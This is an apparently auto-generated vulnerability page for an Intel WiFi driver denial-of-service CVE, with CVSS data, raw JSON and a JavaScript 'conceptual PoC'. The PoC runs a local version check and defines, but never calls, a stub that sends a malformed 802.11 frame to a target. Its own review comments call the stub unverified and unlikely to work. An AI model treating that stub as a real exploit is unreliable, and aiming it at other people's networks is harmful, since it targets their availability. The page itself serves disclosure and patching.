Security Vulnerability Report
CVE-2025-35963 CVSS 7.4 HIGH

CVE-2025-35963

Published: 2025-11-11 17:15:51
Last Modified: 2026-04-15 00:35:42

Description

Insufficient control flow management for some Intel(R) PROSet/Wireless WiFi Software for Windows before version 23.160 within Ring 2: Device Drivers may allow a denial of service. Unprivileged software adversary with an unauthenticated user combined with a low complexity attack may enable denial of service. This result may potentially occur via adjacent access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (none), integrity (none) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (high) impacts.

CVSS Details

CVSS Score
7.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Intel(R) PROSet/Wireless WiFi Software for Windows < 23.160

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
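// CVE-2025-35963 PoC - Intel WiFi Driver DoS
// Note: This is a conceptual PoC for educational purposes only
//
// Review notes:
// - The only part of this script that executes is a local version check of
//   the installed Intel PROSet/Wireless package; sendMalformedFrame() is
//   defined but never called.
// - The CVE record on this page classifies the flaw as CWE-691
//   ("insufficient control flow management") and gives no frame-level detail,
//   so nothing here establishes that the buffer built below reaches the
//   affected driver code.
const { execSync } = require('child_process');

// First version that is no longer affected, per the CVE description
// ("before version 23.160").
const FIXED_VERSION = [23, 160];

/**
 * Compare a dotted version string against a fixed version, component by
 * component. Missing components count as 0.
 *
 * A float comparison is wrong for dotted versions: parseFloat('23.60') is
 * 23.6, which is greater than 23.16, so an affected 23.60 install would be
 * reported as patched.
 *
 * @param {string} version - Dotted numeric version, e.g. '23.60.1'.
 * @param {number[]} fixed - Components of the first fixed version.
 * @returns {boolean} true when `version` sorts strictly before `fixed`.
 */
function isVersionBefore(version, fixed) {
  const parts = version.split('.').map((part) => Number.parseInt(part, 10));
  const length = Math.max(parts.length, fixed.length);
  for (let i = 0; i < length; i++) {
    const have = i < parts.length ? parts[i] : 0;
    const want = i < fixed.length ? fixed[i] : 0;
    if (have !== want) {
      return have < want;
    }
  }
  return false;
}

/**
 * Check whether the locally installed Intel PROSet package is older than the
 * fixed version. This inspects the machine the script runs on, not a remote
 * host.
 *
 * Caveats for inventory use:
 * - `wmic` is deprecated on current Windows releases and may be absent; the
 *   catch branch then reports "unable to determine".
 * - `wmic product` queries Win32_Product, which is known to trigger a Windows
 *   Installer consistency check of installed packages; prefer your endpoint
 *   inventory data where available.
 * - A `false` result covers "patched", "not installed" and "could not be
 *   determined" alike, so it is not proof that the host is unaffected.
 * - Only the first version found in the command output is evaluated.
 *
 * @returns {boolean} true when an installed version below 23.160 was found.
 */
function checkVulnerability() {
  try {
    // The WQL filter needs its closing double quote; without it the command
    // string is not even valid JavaScript.
    const output = execSync(
      'wmic product where "name like \'%Intel%PROSet%\'" get version',
      { encoding: 'utf8' }
    );
    // Capture the whole dotted version, not just the first two components.
    const versionMatch = output.match(/(\d+(?:\.\d+)+)/);
    if (versionMatch) {
      return isVersionBefore(versionMatch[1], FIXED_VERSION);
    }
  } catch (e) {
    console.log('Unable to determine Intel PROSet version');
  }
  return false;
}

// Send malformed 802.11 frame to trigger driver vulnerability
//
// NOTE(review): unverified and unused. The code is kept as published.
// - `raw-socket` is a third-party package that is not declared anywhere on
//   this page; as far as its documentation shows it opens IP-level sockets
//   addressed by IP string, so passing a MAC address is unlikely to do what
//   the name suggests (confirm against the package docs).
// - The comments below disagree with each other: "invalid length field"
//   versus a value labelled "Invalid duration".
// - The CVE record gives no information tying these bytes to the flaw.
function sendMalformedFrame(targetMAC) {
  const rawSocket = require('raw-socket');
  const options = { protocol: rawSocket.Protocol.NONE };
  const socket = rawSocket.createSocket(options);
  // Craft malformed frame with invalid length field
  const maliciousFrame = Buffer.alloc(512);
  maliciousFrame.writeUInt8(0x08, 0); // Frame type: Data
  maliciousFrame.writeUInt8(0x00, 1); // Flags
  maliciousFrame.writeUInt16LE(0xFFFF, 2); // Invalid duration
  // Fill rest with pattern to trigger parsing error
  for (let i = 4; i < 512; i++) {
    maliciousFrame.writeUInt8(i % 256, i);
  }
  socket.send(maliciousFrame, 0, maliciousFrame.length, targetMAC);
  socket.close();
}

// Main execution
// "Target" here is the local machine, because checkVulnerability() only
// inspects the local install.
if (checkVulnerability()) {
  console.log('[+] Target is vulnerable to CVE-2025-35963');
  // The original message claimed frames were being sent, but
  // sendMalformedFrame() is never called (the original comment referenced an
  // undefined `targetIP`). Report the actual state and the remediation.
  console.log('[!] No frames are sent by this script; update Intel PROSet/Wireless WiFi Software to 23.160 or later');
} else {
  console.log('[-] Target is not vulnerable or Intel PROSet not installed');
}
console.log('Note: Actual exploitation requires being on same network segment as target');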

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-35963", "sourceIdentifier": "[email protected]", "published": "2025-11-11T17:15:51.020", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insufficient control flow management for some Intel(R) PROSet/Wireless WiFi Software for Windows before version 23.160 within Ring 2: Device Drivers may allow a denial of service. Unprivileged software adversary with an unauthenticated user combined with a low complexity attack may enable denial of service. This result may potentially occur via adjacent access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (none), integrity (none) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (high) impacts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", 
"modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-691"}]}], "references": [{"url": "https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01398.html", "source": "[email protected]"}]}}